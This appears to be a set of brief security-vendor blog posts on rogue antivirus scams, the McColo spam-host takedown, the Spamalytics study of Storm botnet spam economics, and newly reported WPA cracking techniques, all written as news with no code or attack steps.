Bonjour. By popular demand, E:VOLUTION has been translated into several different languages. You can now find the French version via our YouTube Channel.
Last Friday, we came across a rogue application, VirusResponse Lab 2009, that used a fake 404 page as part of its social engineering attack.
Many rogue affiliate sites will use script to generate animated "online scans" and then attempt to convince the visitor into downloading the rogue installer file via a pop-up dialog.
404dnswebsite .com took a different approach. Rather than producing a fake scan and prompting for a download, it instead simply hosted a fake 404 error message:
If the victim fell for the trick, they would have downloaded what we detect as FraudTool.Win32.Agent.eh.
As you can see from the screenshot above, the fraud page is not at all dynamic. Even though we opened the page with Firefox on a Linux based system, the page displays the text "Internet Explorer".
What's the story? McColo Corp. — major source of spam — was knocked offline earlier this week. And now there's a large decrease in the amount of spam being distributed.
Why is that? Because McColo Corp. was hosting a large number of spam bot control and command servers. Knocking them offline has left the spam bots temporarily without masters.
Unfortunately the bots themselves are still out there, so the spam will eventually return.
You can download a very detailed report on McColo from hostexploit.com.
There's an interesting study on the economics of spamming, reported today at BBC and The Register.
Spamalytics: An Empirical Analysis of Spam Marketing Conversion was authored by researchers from the University of California, Berkeley, and UC San Diego.
Summary: the Storm botnet sends out spam leading interested parties to two sites, a malware-infected site designed to expand the botnet itself and a pharmacy site promoting "male enhancement drugs". It has been assumed that even a few people buying such products would be enough for spammers to make a huge profit, but few studies have been performed to investigate.
In this study, the researchers hacked into the Storm botnet's command and control system to modify a subset of spam already being sent out. The change redirected "any interested recipients to servers under [the researcher's] control, rather than those belonging to the spammer", where the researchers could track sales attempts. They could then use the data to figure out how many actual sales the entire spam operation would be likely to generate.
Interesting points from the analysis: even with a tiny conversion rate of "0.00001 per cent" from spam to sale, spammers can still net a fair bit of profit, but not as much as suggested. Since the conversion rate is so minuscule however, spammers can be really pressured by countermeasures that affect it, like anti-spam filters, blacklists and so on.
The study also clearly documented the reasoning the researchers used to handle the legal and ethical issues they faced, the key points being that they: 1) did not actively send out the spam itself, or create new spam; 2) none of the actions performed based on the methodology were "intrinsically objectionable"; and 3) where there was potential for harm, they worked to "strictly reduce" it.
Yesterday's post, Stupid Rogue Trick, took a look at antivirus-online-scanner .com and a rogue application called Antivirus Professional 2008.
The antivirus-online-scanner site was using GeoIP Lookup to customize the supposed threat that would be displayed to visitors. If you visited from Helsinki, Finland then the threat was called something such as Win32.IRC.Bot.Helsinki.
A nasty trick for the unsuspecting…
Taking a look today, we discovered that the site is offline. Good news, such sites are often difficult to get shutdown. So, who was the ICANN Registrar?
EstDomains. You remember Case EstDomains from two weeks ago don't you?
It seems to be "bad news" season for WPA, as researchers keep finding ways to crack it faster and faster.
Last month, Elcomsoft found a way to use GPU computing architecture to boost a cracking utility's brute-force attack in order to break through WPA encryption "100 times faster than with just a CPU".
Now there's another, newly reported way to attack WPA's Temporal Key Integrity Protocol (TKIP), which can crack an encrypted Address Resolution Protocol (ARP) packet in "less than 15 minutes". More details are available at The Register.